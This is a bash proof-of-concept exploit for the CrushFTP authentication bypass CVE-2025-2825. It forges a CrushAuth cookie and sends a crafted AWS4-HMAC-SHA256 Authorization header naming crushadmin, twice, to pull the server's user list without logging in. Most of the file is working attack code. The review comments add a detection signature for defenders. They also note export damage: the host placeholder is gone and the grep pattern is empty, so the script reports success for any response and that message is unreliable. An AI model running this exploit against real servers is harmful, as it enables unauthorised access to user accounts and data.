#!/bin/bash
# CrushFTP CVE-2025-2825 Auth Bypass Exploit (Improved Version)
# Author: jeongwoongyoon
# This PoC performs a double-request strategy (like nuclei) to increase reliability.
# Usage: ./exploit_crushftp.sh http://: [CrushAuth] [c2f]
#
# Script layout (single flat script, no functions):
#   1. read the target base URL and optional pre-built CrushAuth / c2f values from argv
#   2. otherwise build a random CrushAuth cookie value whose last four characters
#      are reused as the c2f query parameter / currentAuth cookie
#   3. send the same request twice to /WebInterface/function/?command=getUserList
#   4. print the second response
#
# NOTE(review): the usage text reads "http://:" — the host/port placeholder between
# the colons appears to have been lost (likely angle brackets stripped on export).

# Positional arguments; $2 and $3 are optional overrides.
TARGET=$1
CUSTOM_CRUSHAUTH=$2
CUSTOM_C2F=$3

if [ -z "$TARGET" ]; then
  echo "Usage: $0 http://: [CrushAuth] [c2f]"
  exit 1
fi

# Generate or use provided CrushAuth/C2F
# Generated form: 13-digit numeric prefix, "_", 26 alphanumerics, 4-digit suffix
# (44 characters in total). The 4-digit suffix doubles as C2F, so the cookie
# value ends with the same digits that are sent as c2f / currentAuth.
# When a custom CrushAuth is given, C2F is taken from $3 as-is; if $3 is omitted
# C2F stays empty and the URL is built with "c2f=" and no value.
if [ -z "$CUSTOM_CRUSHAUTH" ]; then
  PREFIX=$(shuf -i 1000000000000-9999999999999 -n 1)
  MID=$(head /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 26)
  SUFFIX=$(shuf -i 1000-9999 -n 1)
  CRUSHAUTH="${PREFIX}_${MID}${SUFFIX}"
  C2F=$SUFFIX
else
  CRUSHAUTH=$CUSTOM_CRUSHAUTH
  C2F=$CUSTOM_C2F
fi

# Endpoint queried by both requests; TARGET is used verbatim as the URL prefix,
# so it must include the scheme and must not end in a trailing slash.
URL="$TARGET/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=$C2F"

echo "[+] Target: $TARGET"
echo "[+] CrushAuth: $CRUSHAUTH"
echo "[+] Length: ${#CRUSHAUTH}"
echo "[+] c2f: $C2F"
echo "[*] Sending double exploit request..."

# Send first warmup request (some servers need this)
# Both requests are identical. For detection purposes the observable signature in
# HTTP access/proxy logs is this header combination on a /WebInterface/function/
# request: an "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" header
# together with a CrushAuth cookie whose value ends in the currentAuth / c2f digits.
# The explicit "Accept-Encoding: identity" header replaces the Accept-Encoding
# that --compressed would otherwise send, so the response is requested uncompressed.
# Output of this first request is discarded.
curl -s --compressed "$URL" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \
  -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \
  -H "Origin: $TARGET" \
  -H "Referer: $TARGET/WebInterface/login.html" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Accept-Encoding: identity" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
  -H "Connection: close" > /dev/null

# Fractional sleep requires a sleep(1) that accepts non-integer values (GNU coreutils does).
sleep 0.3

# Second actual trigger request
# Same request again; only this response is kept and inspected below.
# curl is run with -s and no -f/--fail, so HTTP error statuses and connection
# failures both yield an empty or error-page RESPONSE rather than a non-zero exit.
RESPONSE=$(curl -s --compressed "$URL" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \
  -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \
  -H "Origin: $TARGET" \
  -H "Referer: $TARGET/WebInterface/login.html" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Accept-Encoding: identity" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
  -H "Connection: close")

# NOTE(review): the grep pattern on the next line is empty (the original marker
# was apparently stripped on export). An empty pattern matches every line,
# including the single empty line that `echo "$RESPONSE"` emits for an empty
# response, so this test succeeds for any response and the else branch is
# effectively unreachable. The "[+] Exploit successful!" message therefore
# carries no information on its own; the printed response body must be read.
if echo "$RESPONSE" | grep -q ""; then
  echo "[+] Exploit successful!"
  # Same empty pattern: this prints every line of RESPONSE.
  echo "$RESPONSE" | grep ""
else
  echo "[-] Exploit failed or blocked."
  echo "[*] Partial Response:"
  echo "$RESPONSE" | head -n 20
fi